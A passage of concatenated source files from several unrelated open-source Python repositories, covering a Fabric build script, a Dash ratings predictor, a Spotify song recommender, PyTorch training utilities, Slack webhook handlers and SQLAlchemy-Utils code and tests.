__getCopyrightHeader() + "\n\n" if c == "node": print "We no longer handle node adapter" # bootstrap += patched_namespace + namespace_adapter + requirejs + requirejs_node + open("lib/adapters/%s/global.exec.js" % c).read() # patch needed in require.js # bootstrap = bootstrap.replace("var require, define;", "") else: bootstrap += requirejs + patched_namespace + namespace_adapter print "Writing %s ..." % ("lib/adapters/%s/bootstrap.js" % c) open("lib/adapters/%s/bootstrap.js" % c, "w").write(bootstrap) open("lib/adapters/%s/modules.json" % c, "w").write( json.dumps(sources)) def _getFinalTarGzName(): package = json.load(open("package.json", "r")) version = package["version"] finalname = "joshfire-framework-%s.tar.gz" % version return finalname # release def targz(): finalname = _getFinalTarGzName() local("rm -rf export/") local("mkdir -p export/") local("git archive --format=tar -o export/a.tar HEAD") local("cd export && tar xvf a.tar && rm a.tar") # fix some files local("rm export/lib/uielements/forminput.js") # include optimized builds in examples optimizeexamples() local("cp -R examples/videolist/export export/examples/videolist/") local("cd export && tar czvf %s *" % finalname) return finalname def prod(): env.hosts = ['joshfire.com'] env.path = '/home/mikiane/joshfiredocs' env.user = 'mikiane' def targzup(): targz() finalname = _getFinalTarGzName() run("mkdir -p %s/shared/downloads/" % env.path) put('export/%s' % finalname, '%s/shared/downloads/%s' % (env.path, finalname)) """ Code quality checking """ def jslint(files=0): """ Checks js files using JSLint """ files = files.split(" ") if not files == 0 else list_js_files() for file in files: with settings(hide("warnings", "running"), warn_only=True): # output = local("jslint -nologo -conf build/jsl.conf -process %s" # % file, True) output = local("jslint %s" % file, True) if output.endswith("No errors found.") == True: print fabric.colors.green("OK ", True) + file else: print fabric.colors.red("KO ", True) + file print output[output.find("\n"):] def jshint(files=0): """ Checks js files using JSHint """ files = files.split(" ") if not files == 0 else list_js_files() for file in files: with settings(hide("warnings", "running"), warn_only=True): output = local("jshint %s" % file, True) if output.endswith("OK!") == True: print fabric.colors.green("OK ", True) + file else: print fabric.colors.red("KO ", True) + file print output def gjslint(files=0): """ Checks js files using gjslint for compliance with Google coding style """ files = files.split(" ") if not files == 0 else list_js_files() for file in files: with settings(hide("warnings", "running"), warn_only=True): output = local("gjslint --strict --custom_jsdoc_tags function,namespace,constructs,options,augments,static,extend %s" % file, True) offset = output.find("\nSome of the errors") if offset == -1: print fabric.colors.green("OK ", True) + file else: print fabric.colors.red("KO ", True) + file print output[output.find("\n"):offset] def optimizeexamples(): local("cd examples/videolist/ && fab optimize") """ Reindent & apply Google coding style """ """ Generate API documentation """ def jsdoc(files=0): files = files.split(" ") if not files == 0 else list_js_files(dirs=["lib"]) export = "doc/content/api" local("rm -rf ./%s/*" % export) local("java -jar build/jsdoc-toolkit/jsrun.jar build/jsdoc-toolkit/app/run.js -a -c=build/jsdoc-toolkit/jsdoc.conf -d=%s -t=build/jsdoc-toolkit/templates/jsdoc-tably-joshfire %s" % (export, " ".join(files))) """ local("wkhtmltopdf %s/*.html %s/symbols/*.html %s/JoshfireApiReference.pdf", (export, export, export)) local("rm -rf doc/lib/jsdoc/*") local("java -jar build/jsdoc-toolkit/jsrun.jar build/jsdoc-toolkit/app/run.js -a -t=build/jsdoc-toolkit/templates/jsdoc-rst -c=build/jsdoc-toolkit/jsdoc.conf -d=doc/jsdoc-html %s" % " ".join(files)) """ def pdfdoc(): print "www-joshfire must be running on localhost:40009 !" doc_content = list_js_files( dirs=["doc/content/"], excluded_dirs="api", extension=".html") requests = ["http://localhost:40009/doc/dev/%s" % re.sub( "(index)?\.html$", "", x[13:]) for x in doc_content] os.system("rm -rf doc/export/pdfdoc/") os.system("mkdir -p doc/export/pdfdoc/") output_files = [] for r in requests: output_files.append("doc/export/pdfdoc/%sx.html" % r[31:]) os.system("mkdir -p %s" % (os.path.dirname(output_files[-1]))) os.system("curl %s -o %s" % (r, output_files[-1])) os.system("wkhtmltopdf %s doc/export/pdfdoc/JoshfireDoc.pdf" % ( " ".join(output_files))) def fix(files=0): """ Alias on fixjsstyle """ fixjsstyle(files) def fixjsstyle(files=0): """ Fix js files using fixjsstyle to comply with Google coding style """ files = files.split(" ") if not files == 0 else list_js_files() for file in files: with settings(hide("warnings", "running"), warn_only=True): output = local("fixjsstyle --strict --custom_jsdoc_tags function,namespace,constructs,options,augments,static,extend %s" % file, True) if output == "": print fabric.colors.white("CLEAN ", True) + file else: print fabric.colors.green("FIXED ", True) + file print output # ugly patch to indent properly JSDoc com since fixjsstyle does not file = open(file, "r+") lines = file.readlines() idx = 0 while idx < len(lines): if lines[idx].strip()[0:2] == '/*': level = lines[idx].find('/*') idx += 1 while idx < len(lines): lines[idx] = " " * level + lines[idx].strip() + "\n" if lines[idx].find('*/') != -1: break idx += 1 idx += 1 file.seek(0) file.truncate() file.write("".join(lines)) file.close() def preparerelease(): optimizeexamples() jsdoc() fixjsstyle() fixjsstyle() copyright() bootstraps() # todo tests once more def copyright(files=0): """ Add copyright header to source files """ header = __getCopyrightHeader().split("\n") + ['', ''] # Add files = files.split(" ") if not files == 0 else list_js_files() for file in files: name = file buf = open(file, "r").read() f = open(file, "w") f.write("\n".join(header)) f.write( re.compile("^\s*((\/\*\!(.*?)\*\/)\s*)*", re.DOTALL).sub("", buf)) f.close() print fabric.colors.green("COPYRIGHTED ", True) + name def __getCopyrightHeader(): """ Add copyright header to source files """ # Get framework version file = open('package.json', 'r') version = json.loads(file.read())['version'] file.close() # Get header template file = open('build/LICENSE.HEADER', 'r') header = file.read() file.close now = datetime.datetime.now() header = header.replace('$VERSION', version).replace( '$YEAR', str(now.year)).replace('$DATE', now.ctime()) return header ```
{ "source": "JoshFowlkes/amazon-ratings-dash-app", "score": 3 }
#### File: amazon-ratings-dash-app/pages/predictions.py ```python import dash import dash_bootstrap_components as dbc import dash_core_components as dcc import dash_html_components as html from dash.dependencies import Input, Output from joblib import load from sklearn.impute import SimpleImputer from app import app pipeline = load('pages/pipeline.joblib') column1 = dbc.Col( [ dcc.Markdown( """ ## Predictions Below is a number of Sliders that affect the outcomes of our predicitive modeling. Price """ ), dcc.Slider( id='price', min=0, max=250, step=1, value=20, marks={n: str(n) for n in range(0,250,25)}, className='mb-5', updatemode='drag', ), dcc.Markdown( """ Number of Available Stock """ ), dcc.Slider( id='number_available_in_stock', min=0, max=95, step=1, value=20, marks={n: str(n) for n in range(0,95,10)}, className='mb-5', updatemode='drag', ), dcc.Markdown( """ Number of Reviews """ ), dcc.Slider( id='number_of_reviews', min=0, max=1400, step=1, value=20, marks={n: str(n) for n in range(0,1400,100)}, className='mb-5', updatemode='drag', ), dcc.Markdown( """ Number of Answered Questions """ ), dcc.Slider( id='number_of_answered_questions', min=0, max=40, step=1, value=20, marks={n: str(n) for n in range(0,40,5)}, className='mb-5', updatemode='drag', ), dcc.Markdown( """ Description?(1 for Yes, 0 for No) """ ), dcc.Slider( id='new_description', min=0, max=1, step=1, value=0, marks={n: str(n) for n in range(0,1,1)}, className='mb-5', updatemode='drag', ), dcc.Markdown( """ Customer Written Reviews?(1 for Yes, 0 for No) """ ), dcc.Slider( id='new_customer_reviews', min=0, max=1, step=1, value=0, marks={n: str(n) for n in range(0,1,1)}, className='mb-5', updatemode='drag', ), dcc.Markdown( """ Seller Answers Customer Questions?(1 for Yes, 0 for No) """ ), dcc.Slider( id='new_customer_questions_and_answers', min=0, max=1, step=1, value=0, marks={n: str(n) for n in range(0,1,1)}, className='mb-5', updatemode='drag', ), dcc.Markdown( """ Product Information Section?(1 for Yes, 0 for No) """ ), dcc.Slider( id='new_product_information', min=0, max=1, step=1, value=0, marks={n: str(n) for n in range(0,1,1)}, className='mb-5', updatemode='drag', ), ], md=5, ) column2 = dbc.Col( [ html.H2('Predicated Rating', className='mb-5'), html.Div(id='prediction-content', className='lead'), html.Img(src='assets/pdp3.png', className='img-fluid'), dcc.Markdown( """ Important note, majority of the adjustable parameters listed on the left generally operate in a range and outside of that range the results tend to get more unreliable. For example, illustrated in the graph above, majority of the items in the dataset used in this predictive model were $50 or less. Thus this predictive model is most accurate for items around that price area. However, within the dataset there were a few items that were priced much higher, one for instance had a price over $2400. This applies for all the adjustable inputs to the left. The parameters are already preset to only allow parameter values close to the model's optimal range, however there is a enough wiggle room that outliers on either end will affect accuracy in the prediction. """ ) ], ) layout = dbc.Row([column1, column2]) import pandas as pd @app.callback( Output('prediction-content', 'children'), [Input('price', 'value'), Input('number_available_in_stock', 'value'), Input('number_of_reviews', 'value'), Input('number_of_answered_questions', 'value'), Input('new_description', 'value'), Input('new_customer_reviews', 'value'), Input('new_customer_questions_and_answers', 'value'), Input('new_product_information', 'value')], ) def predict(price, number_available_in_stock, number_of_reviews, number_of_answered_questions, new_description, new_customer_reviews, new_customer_questions_and_answers, new_product_information): y_pred = pipeline.predict([[price, number_available_in_stock, number_of_reviews, number_of_answered_questions, new_description, new_customer_reviews, new_customer_questions_and_answers, new_product_information]]) estimate = y_pred[0] return f'{estimate:.2f}/5 Star Rated Product' ```
{ "source": "JoshFowlkes/Data-science", "score": 3 }
#### File: JoshFowlkes/Data-science/SpotifyProjectFirstModel.py ```python import os try: os.chdir(os.path.join(os.getcwd(), 'SpotifyProject')) print(os.getcwd()) except: pass #%% import pandas as pd import numpy as np from sklearn.preprocessing import StandardScaler from sklearn.neighbors import KDTree #%% df = pd.read_csv('SpotifyAudioFeaturesApril2019 copy.csv') #%% df.head() #%% # Now to Make a Function to sum all this up and try different clustering models def find_nearest_songs(df): # remove categoricals df_numerics = df.drop(columns=['track_id', 'track_name', 'artist_name']) # Scale Data To Cluster More Accurately, and fit clustering model df_scaled = StandardScaler().fit_transform(df_numerics) df_modeled = KDTree(df_scaled) # Querying the model for the 15 Nearest Neighbors dist, ind = df_modeled.query(df_scaled, k=16) # Putting the Results into a Dataframe dist_df = pd.DataFrame(dist) # Calculating the Distances scores = (1 - ((dist - dist.min()) / (dist.max() - dist.min()))) * 100 # Creating A New Dataframe for the Distances columns = ['Searched_Song', 'Nearest_Song1', 'Nearest_Song2', 'Nearest_Song3', 'Nearest_Song4', 'Nearest_Song5', 'Nearest_Song6', 'Nearest_Song7', 'Nearest_Song8', 'Nearest_Song9', 'Nearest_Song10', 'Nearest_Song11', 'Nearest_Song12', 'Nearest_Song13', 'Nearest_Song14', 'Nearest_Song15'] dist_score = pd.DataFrame(scores.tolist(), columns = columns) # An Array of all indices of the nearest neighbors ind[:16] # Making an array of the Track IDs song_ids = np.array(df.track_id) # A function that creates list of the each song with its nearest neighbors def find_similars(song_ids, ind): similars = [] for row in ind: ids = [song_ids[i] for i in row] similars.append(ids) return similars # using the above function nearest_neighbors = find_similars(song_ids, ind) # putting the results into a dataframe nearest_neighbors_df = pd.DataFrame(nearest_neighbors, columns=columns) return nearest_neighbors_df #%% # this takes a good two to three minutes to process find_nearest_songs(df) #%% # From here, if we add both the new dataframe and the original into an SQL database, we can easily # just run JOIN ON queries to match the song Id's with track_name, artist, and any other info we'd want to display ```
{ "source": "JoshFowlkes/DS-Unit-3-Sprint-1-Software-Engineering", "score": 4 }
#### File: DS-Unit-3-Sprint-1-Software-Engineering/Sprint copy/acme.py ```python import random """ Making The Product Class as outlined in Instructions """ class Product: def __init__(self, name, price=10, weight=20, flammability=.5): self.name = name self.price = price self.weight = weight self.flammability = flammability self.identifier = random.randint(100000, 999999) """ Making the Stealability Function """ def stealability(self): steal_ratio = self.price / self.weight if (steal_ratio < .05): return 'Not so stealable' elif (steal_ratio >= .5) and (steal_ratio < 1.0): return 'Kinda stealable' else: return 'Very Stealable!' """ Making the Explode Function """ def explode(self): explode_ratio = self.flammability * self.weight if (explode_ratio < 10): return '...fizzle.' elif (explode_ratio >= 10) and (explode_ratio < 50): return '...boom!' else: return 'BABOOOOM BABAY!!!!' ### part 3 """ Making the BoxingGlove Subclass of Product """ class BoxingGlove(Product): def __init__(self, name): super.__init__(name, weight=10) def explode(self): return "...it's a glove." """ Making the Punch Function """ def punch(self): if (self.weight < 5): return 'That tickles.' elif (self.weight >= 5) and (self.weight < 15): return 'Hey that hurt!' else: return 'OUCH!' ``` #### File: DS-Unit-3-Sprint-1-Software-Engineering/Sprint copy/acme_report.py ```python from random import randint, sample, uniform from acme import Product """ Making lists of adjectives and nouns to be used as names """ ADJECTIVES = ['Awesome', 'Shiny', 'Impressive', 'Portable', 'Improved'] NOUNS = ['Anvil', 'Catapult', 'Disguise', 'Mousetrap', '???'] """ Generate Products functions """ def generate_products(num_products=30): products = [] """ Making a for loop to make each individual product """ for _ in range(num_products): name = ADJECTIVES[randint(0,len(ADJECTIVES)-1)] + \ ' ' + NOUNS[randint(0, len(NOUNS)-1)] price = randint(5, 100) weight = randint(5, 100) flammability = uniform(0.0, 2.5) prod = Product(name=name, price=price, weight=weight, flammability=flammability) products.append(prod) return products """ Making inventory report function """ def inventory_report(products): if not isinstance(products, list): raise TypeError('`products` - parameter passed must be a list') n_prod = len(products) if n_prod < 1 or (products is None): return ValueError("`products` - parameter must be a non-empty list.") tot_price, tot_wt, tot_flm = 0, 0, 0 for product in products: tot_price += product.price tot_wt += product.weight tot_flm += product.flammability avg_price = tot_price / n_prod avg_wt = tot_wt / n_prod avg_flm = tot_flm / n_prod print("ACME CORPORATION OFFICIAL INVENTORY REPORT") print("Unique product names:", len(set(products))) print("Average price:", avg_price) print("Average weight:", avg_wt) print("Average flammability:", avg_flm) if __name__ == '__main__': inventory_report(generate_products()) ```
{ "source": "joshfp/onfire", "score": 2 }
#### File: onfire/colab/runners.py ```python import torch from torch.optim import Adam from torch.optim.lr_scheduler import OneCycleLR from fastprogress.fastprogress import master_bar, progress_bar from collections import defaultdict import inspect import matplotlib.pyplot as plt from onfire.utils import batch_to_device all = [ 'SupervisedRunner', ] class SupervisedRunner: def __init__(self, model, loss_fn): self.model = model self.loss_fn = loss_fn def fit(self, train_dl, valid_dl, epochs, lr, metrics=None, optimizer=None, scheduler=None): device = 'cuda' if torch.cuda.is_available() else 'cpu' self.model.to(device) optimizer = optimizer or Adam(self.model.parameters(), lr) if scheduler != False: scheduler = scheduler or OneCycleLR(optimizer, lr, epochs * len(train_dl)) else: scheduler = None self.train_stats = TrainTracker(metrics, validate=(valid_dl is not None)) bar = master_bar(range(epochs)) bar.write(self.train_stats.metrics_names, table=True) for epoch in bar: self.model.train() for batch in progress_bar(train_dl, parent=bar): batch = batch_to_device(batch, device) loss = self._train_batch(batch, optimizer, scheduler) loss.backward() optimizer.step() optimizer.zero_grad() if scheduler: scheduler.step() self.train_stats.update_train_loss(loss) valid_outputs = [] if valid_dl: self.model.eval() for batch in progress_bar(valid_dl, parent=bar): batch = batch_to_device(batch, device) output = self._valid_batch(batch) valid_outputs.append(output) self.train_stats.log_epoch_results(valid_outputs) bar.write(self.train_stats.get_metrics_values(), table=True) def predict(self, dl, include_target=False): device = 'cuda' if torch.cuda.is_available() else 'cpu' self.model.to(device) self.model.eval() preds, ys = [], [] for batch in progress_bar(dl): batch = batch_to_device(batch, device) pred, y = self._predict_batch(batch, include_target) preds.append(pred) ys.append(y) preds = torch.cat(preds) return (preds, torch.cat(ys)) if include_target else preds def _train_batch(self, batch, optimizer, scheduler): *xb, yb = batch output = self.model(*xb) return self.loss_fn(output, yb) def _valid_batch(self, batch): *xb, yb = batch with torch.no_grad(): output = self.model(*xb) loss = self.loss_fn(output, yb) return {'loss': loss.item(), 'y_true': yb.cpu(), 'y_pred': output.cpu()} def _predict_batch(self, batch, include_target): xb = batch[:-1] if len(batch) > 1 else [batch[0]] yb = batch[-1].cpu() if include_target and len(batch) > 1 else None with torch.no_grad(): output = self.model(*xb) return output.cpu(), yb class TrainTracker: def __init__(self, metrics, validate): if validate: self.valid_loss = [] metrics = metrics if isinstance(metrics, (list, tuple)) else [metrics] self.metrics = [Metric(metric_fn) for metric_fn in metrics if metric_fn] self.train_smooth_loss = ExponentialMovingAverage() self.train_loss = [] self.epoch = 0 self.validate = validate @property def metrics_names(self): default_metrics = ['epoch', 'train_loss'] metrics = [] if self.validate: metrics.append('valid_loss') metrics.extend([metric.name for metric in self.metrics]) return default_metrics + metrics def update_train_loss(self, loss): self.train_smooth_loss.update(loss.item()) def log_epoch_results(self, valid_output): self.epoch = self.epoch + 1 self.train_loss.append(self.train_smooth_loss.value) if self.validate: valid_output = self._process_valid_output(valid_output) valid_loss = valid_output['loss'].mean().item() for metric in self.metrics: metric.update(**valid_output) self.valid_loss.append(valid_loss) def get_metrics_values(self, decimals=5): default_metrics = [self.epoch, self.train_loss[-1]] metrics = [] if self.validate: metrics.append(self.valid_loss[-1]) metrics.extend([metric.value for metric in self.metrics]) res = default_metrics + metrics return [str(x) if isinstance(x, int) else str(round(x, decimals)) for x in res] def _process_valid_output(self, valid_output): res = defaultdict(list) for d in valid_output: for k, v in d.items(): v = v if isinstance(v, torch.Tensor) else torch.tensor(v) v = v if len(v.shape) else v.view(1) res[k].append(v) return {k: torch.cat(v) for k, v in res.items()} def plot_loss(self): fig, ax = plt.subplots() ax.plot(self.train_loss, label='train') ax.plot(self.valid_loss, label='valid') ax.legend() class ExponentialMovingAverage(): def __init__(self, beta=0.1): self.beta = beta self.initialized = False def update(self, value): if self.initialized: self.mean = value * self.beta + self.mean * (1 - self.beta) else: self.mean = value self.initialized = True @property def value(self): return self.mean class Metric: def __init__(self, metric_fn): self.metric_fn = metric_fn self.name = metric_fn.__name__ if inspect.isfunction(metric_fn) else str(metric_fn) self.value = None def update(self, **kwargs): y_true, y_pred = kwargs['y_true'], kwargs['y_pred'] self.value = self.metric_fn(y_true, y_pred) ``` #### File: onfire/onfire/embedders.py ```python import torch import torch.nn as nn __all__ = [ 'ConcatEmbeddings', 'PassThrough', 'MeanOfEmbeddings', ] class ConcatEmbeddings(nn.Module): def __init__(self, fields): super().__init__() self.output_dim = sum([field.output_dim for field in fields.values()]) self.embedders = nn.ModuleList([field.build_embedder() for field in fields.values()]) def forward(self, x): res = [embedder(values) for embedder, values in zip(self.embedders, x)] return torch.cat(res, dim=1) class PassThrough(nn.Module): def forward(self, x): return x class MeanOfEmbeddings(nn.Module): def __init__(self, vocab_size, emb_dim): super().__init__() self.emb = nn.Embedding(vocab_size, emb_dim, padding_idx=0) def forward(self, x): mask = (x != 0).float()[:, :, None] emb = self.emb(x) * mask.float() s = mask.squeeze(2).sum(1).clamp_min(1.)[:, None].float() return emb.sum(dim=1) / s ``` #### File: onfire/onfire/utils.py ```python from functools import wraps import torch __all__ = [ 'mappify', 'batch_to_device', ] def mappify(func): @wraps(func) def inner(X, **kwargs): return [func(x, **kwargs) for x in X] return inner def batch_to_device(batch, device): if isinstance(batch, torch.Tensor): return batch.to(device) elif isinstance(batch, (list, tuple)): res = [batch_to_device(x, device) for x in batch] return res if isinstance(batch, list) else tuple(res) elif isinstance(batch, dict): return {k: batch_to_device(v, device) for k, v in batch.items()} ```
{ "source": "joshfriend/atlas", "score": 2 }
#### File: api/webhooks/slash.py ```python import re import json from textwrap import dedent from flask import jsonify, Response, request from flask.views import MethodView from webargs.flaskparser import use_args from atlas.api import api_v1_blueprint as bp, log, require_token from atlas.api.webhooks import slash_cmd_args from atlas.api.webhooks.jira_mention import jira_command from atlas.utils import slack_encode class SlashCommand(MethodView): def get(self): # Before submitting a command to your server, Slack will occasionally # send your command URLs a simple GET request to verify the # certificate. These requests will include a parameter `ssl_check` set # to 1. Mostly, you may ignore these requests, but please do respond # with a HTTP `200 OK`. if request.args.get('ssl_check', 0, type=int): log.info('SSL Check...') return Response() else: abort(400) @require_token @use_args(slash_cmd_args) def post(self, args): command = args['command'] if command == '/jira': return jira_command(args) elif command == '/debug': debug_data = '```\n%s\n```' % json.dumps(request.form, indent=2) return ephemeral_message(debug_data) else: log.error('Unknown command: %s', command) msg = 'I don\'t know what to do with that command :(' return ephemeral_message(msg) bp.add_url_rule('/webhooks/slash', view_func=SlashCommand.as_view('slash')) def ephemeral_message(txt): return jsonify({ 'response_type': 'ephemeral', 'text': slack_encode(txt), }) ``` #### File: atlas/atlas/database.py ```python from collections import Container from datetime import datetime import pytz from sqlalchemy.orm import joinedload from atlas.extensions import db class CRUDMixin(object): """Mixin that adds convenience methods for CRUD (create, read, update, delete) operations. """ @classmethod def create(cls, commit=True, **kwargs): """Create a new record and save it the database.""" instance = cls(**kwargs) return instance.save(commit=commit) def update(self, commit=True, **kwargs): """Update specific fields of a record.""" # Prevent changing ID of object kwargs.pop('id', None) for attr, value in kwargs.iteritems(): setattr(self, attr, value) return commit and self.save(commit=commit) or self def save(self, commit=True): """Save the record.""" db.session.add(self) if commit: db.session.commit() return self def delete(self, commit=True): """Remove the record from the database.""" db.session.delete(self) return commit and db.session.commit() class Model(CRUDMixin, db.Model): """Base model class that includes CRUD convenience methods.""" __abstract__ = True @classmethod def get_by_field(cls, field, value): col = getattr(cls, field) return cls.query.filter(col == value).first() class TimestampedModel(Model): """Mixin that add convenience methods for CRUD that also timestamps creation and modification times. """ __abstract__ = True created_at = db.Column(db.DateTime(timezone=True)) last_updated = db.Column(db.DateTime(timezone=True)) def __init__(self, *args, **kwargs): Model.__init__(self, *args, **kwargs) now = datetime.now(pytz.utc) self.created_at = now self.last_updated = now @classmethod def create(cls, commit=True, **kwargs): instance = cls(**kwargs) now = datetime.now(pytz.utc) instance.created_at = now instance.last_updated = now return instance.save(commit=commit) def update(self, commit=True, update_timestamp=True, **kwargs): """Update specific fields of a record.""" if update_timestamp: now = datetime.now(pytz.utc) self.last_updated = now # Prevent changing ID of object kwargs.pop('id', None) for attr, value in kwargs.iteritems(): setattr(self, attr, value) return self.save(commit=commit, update_timestamp=update_timestamp) def save(self, commit=True, update_timestamp=True): if update_timestamp: now = datetime.now(pytz.utc) self.last_updated = now db.session.add(self) if commit: db.session.commit() return self # From <NAME>'s "Building the app" talk # https://speakerdeck.com/zzzeek/building-the-app class SurrogatePK(object): """A mixin that adds a surrogate integer 'primary key' column named ``id`` to any declarative-mapped class. """ __table_args__ = {'extend_existing': True} id = db.Column(db.Integer, primary_key=True) @classmethod def get_by_id(cls, id, with_=[]): if any( (isinstance(id, str) and id.isdigit(), isinstance(id, (int, float))), ): query = cls.query for prop in with_: query = query.options(joinedload(prop)) return query.get(int(id)) return None @classmethod def get_by_ids(cls, ids): if isinstance(ids, Container) and not isinstance(ids, str): return cls.query.filter(cls.id.in_(ids)) return None def __repr__(self): # pragma: no cover return '<%s(%s)>' % (self.__class__.__name__, self.id) ``` #### File: atlas/models/slack_token.py ```python from atlas.extensions import db from atlas.database import SurrogatePK, TimestampedModel class SlackToken(SurrogatePK, TimestampedModel): token = db.Column(db.String, unique=True, nullable=False) channel = db.Column(db.String, nullable=False) description = db.Column(db.String) @classmethod def get(cls, token): return cls.query.filter(cls.token == token).first() @classmethod def is_valid(cls, token): return cls.get(token) is not None def __str__(self): msg = '`%s`' % self.token if self.channel == '*': msg += ' in all channels: ' else: msg += ' in channel #%s: ' % self.channel msg += self.description return msg ```
{ "source": "joshfriend/sqlalchemy-utils", "score": 2 }
#### File: sqlalchemy-utils/sqlalchemy_utils/decorators.py ```python from collections import defaultdict import itertools import sqlalchemy as sa import six from .functions import getdotattr class AttributeValueGenerator(object): def __init__(self): self.listener_args = [ ( sa.orm.mapper, 'mapper_configured', self.update_generator_registry ), ( sa.orm.session.Session, 'before_flush', self.update_generated_properties ) ] self.reset() def reset(self): if ( hasattr(self, 'listeners_registered') and self.listeners_registered ): for args in self.listener_args: sa.event.remove(*args) self.listeners_registered = False # TODO: make the registry a WeakKey dict self.generator_registry = defaultdict(list) def generator_wrapper(self, func, attr, source): def wrapper(self, *args, **kwargs): return func(self, *args, **kwargs) if isinstance(attr, sa.orm.attributes.InstrumentedAttribute): self.generator_registry[attr.class_].append(wrapper) wrapper.__generates__ = attr, source else: wrapper.__generates__ = attr, source return wrapper def register_listeners(self): if not self.listeners_registered: for args in self.listener_args: sa.event.listen(*args) self.listeners_registered = True def update_generator_registry(self, mapper, class_): """ Adds generator functions to generator_registry. """ for generator in class_.__dict__.values(): if hasattr(generator, '__generates__'): self.generator_registry[class_].append(generator) def update_generated_properties(self, session, ctx, instances): for obj in itertools.chain(session.new, session.dirty): class_ = obj.__class__ if class_ in self.generator_registry: for func in self.generator_registry[class_]: attr, source = func.__generates__ if not isinstance(attr, six.string_types): attr = attr.name if source is None: setattr(obj, attr, func(obj)) else: setattr(obj, attr, func(obj, getdotattr(obj, source))) generator = AttributeValueGenerator() def generates(attr, source=None, generator=generator): """ .. deprecated:: 0.28.0 Use :func:`.observer.observes` instead. Decorator that marks given function as attribute value generator. Many times you may have generated property values. Usual cases include slugs from names or resized thumbnails from images. SQLAlchemy-Utils provides a way to do this easily with `generates` decorator: :: class Article(Base): __tablename__ = 'article' id = sa.Column(sa.Integer, primary_key=True) name = sa.Column(sa.Unicode(255)) slug = sa.Column(sa.Unicode(255)) @generates(slug) def _create_slug(self): return self.name.lower().replace(' ', '-') article = self.Article() article.name = u'some article name' self.session.add(article) self.session.flush() assert article.slug == u'some-article-name' You can also pass the attribute name as a string argument for `generates`: :: class Article(Base): ... @generates('slug') def _create_slug(self): return self.name.lower().replace(' ', '-') These property generators can even be defined outside classes: :: class Article(Base): __tablename__ = 'article' id = sa.Column(sa.Integer, primary_key=True) name = sa.Column(sa.Unicode(255)) slug = sa.Column(sa.Unicode(255)) @generates(Article.slug) def _create_article_slug(article): return article.name.lower().replace(' ', '-') Property generators can have sources outside: :: class Document(self.Base): __tablename__ = 'document' id = sa.Column(sa.Integer, primary_key=True) name = sa.Column(sa.Unicode(255)) locale = sa.Column(sa.String(10)) class Section(self.Base): __tablename__ = 'section' id = sa.Column(sa.Integer, primary_key=True) name = sa.Column(sa.Unicode(255)) locale = sa.Column(sa.String(10)) document_id = sa.Column( sa.Integer, sa.ForeignKey(Document.id) ) document = sa.orm.relationship(Document) @generates(locale, source='document') def copy_locale(self, document): return document.locale You can also use dotted attribute paths for deep relationship paths: :: class SubSection(self.Base): __tablename__ = 'subsection' id = sa.Column(sa.Integer, primary_key=True) name = sa.Column(sa.Unicode(255)) locale = sa.Column(sa.String(10)) section_id = sa.Column( sa.Integer, sa.ForeignKey(Section.id) ) section = sa.orm.relationship(Section) @generates(locale, source='section.document') def copy_locale(self, document): return document.locale """ generator.register_listeners() def wraps(func): return generator.generator_wrapper(func, attr, source) return wraps ``` #### File: sqlalchemy-utils/tests/__init__.py ```python import warnings import sqlalchemy as sa from sqlalchemy import create_engine from sqlalchemy.orm import sessionmaker from sqlalchemy.ext.declarative import declarative_base, synonym_for from sqlalchemy.ext.hybrid import hybrid_property from sqlalchemy_utils import ( InstrumentedList, coercion_listener, aggregates, i18n ) @sa.event.listens_for(sa.engine.Engine, 'before_cursor_execute') def count_sql_calls(conn, cursor, statement, parameters, context, executemany): try: conn.query_count += 1 except AttributeError: conn.query_count = 0 warnings.simplefilter('error', sa.exc.SAWarning) sa.event.listen(sa.orm.mapper, 'mapper_configured', coercion_listener) def get_locale(): class Locale(): territories = {'fi': 'Finland'} return Locale() class TestCase(object): dns = 'sqlite:///:memory:' create_tables = True def setup_method(self, method): self.engine = create_engine(self.dns) # self.engine.echo = True self.connection = self.engine.connect() self.Base = declarative_base() self.create_models() sa.orm.configure_mappers() if self.create_tables: self.Base.metadata.create_all(self.connection) Session = sessionmaker(bind=self.connection) self.session = Session() i18n.get_locale = get_locale def teardown_method(self, method): aggregates.manager.reset() self.session.close_all() if self.create_tables: self.Base.metadata.drop_all(self.connection) self.connection.close() self.engine.dispose() def create_models(self): class User(self.Base): __tablename__ = 'user' id = sa.Column(sa.Integer, autoincrement=True, primary_key=True) name = sa.Column(sa.Unicode(255)) class Category(self.Base): __tablename__ = 'category' id = sa.Column(sa.Integer, primary_key=True) name = sa.Column(sa.Unicode(255)) @hybrid_property def articles_count(self): return len(self.articles) @articles_count.expression def articles_count(cls): return ( sa.select([sa.func.count(self.Article.id)]) .where(self.Article.category_id == self.Category.id) .correlate(self.Article.__table__) .label('article_count') ) @property def name_alias(self): return self.name @synonym_for('name') @property def name_synonym(self): return self.name class Article(self.Base): __tablename__ = 'article' id = sa.Column(sa.Integer, primary_key=True) name = sa.Column(sa.Unicode(255), index=True) category_id = sa.Column(sa.Integer, sa.ForeignKey(Category.id)) category = sa.orm.relationship( Category, primaryjoin=category_id == Category.id, backref=sa.orm.backref( 'articles', collection_class=InstrumentedList ) ) self.User = User self.Category = Category self.Article = Article def assert_contains(clause, query): # Test that query executes query.all() assert clause in str(query) ``` #### File: tests/observes/test_o2o_o2o_o2o.py ```python import sqlalchemy as sa from sqlalchemy_utils.observer import observes from tests import TestCase class TestObservesForOneToOneToOneToOne(TestCase): dns = 'postgres://postgres@localhost/sqlalchemy_utils_test' def create_models(self): class Catalog(self.Base): __tablename__ = 'catalog' id = sa.Column(sa.Integer, primary_key=True) product_price = sa.Column(sa.Integer) @observes('category.sub_category.product') def product_observer(self, product): self.product_price = product.price if product else None category = sa.orm.relationship( 'Category', uselist=False, backref='catalog' ) class Category(self.Base): __tablename__ = 'category' id = sa.Column(sa.Integer, primary_key=True) catalog_id = sa.Column(sa.Integer, sa.ForeignKey('catalog.id')) sub_category = sa.orm.relationship( 'SubCategory', uselist=False, backref='category' ) class SubCategory(self.Base): __tablename__ = 'sub_category' id = sa.Column(sa.Integer, primary_key=True) category_id = sa.Column(sa.Integer, sa.ForeignKey('category.id')) product = sa.orm.relationship( 'Product', uselist=False, backref='sub_category' ) class Product(self.Base): __tablename__ = 'product' id = sa.Column(sa.Integer, primary_key=True) price = sa.Column(sa.Integer) sub_category_id = sa.Column( sa.Integer, sa.ForeignKey('sub_category.id') ) self.Catalog = Catalog self.Category = Category self.SubCategory = SubCategory self.Product = Product def create_catalog(self): sub_category = self.SubCategory(product=self.Product(price=123)) category = self.Category(sub_category=sub_category) catalog = self.Catalog(category=category) self.session.add(catalog) self.session.flush() return catalog def 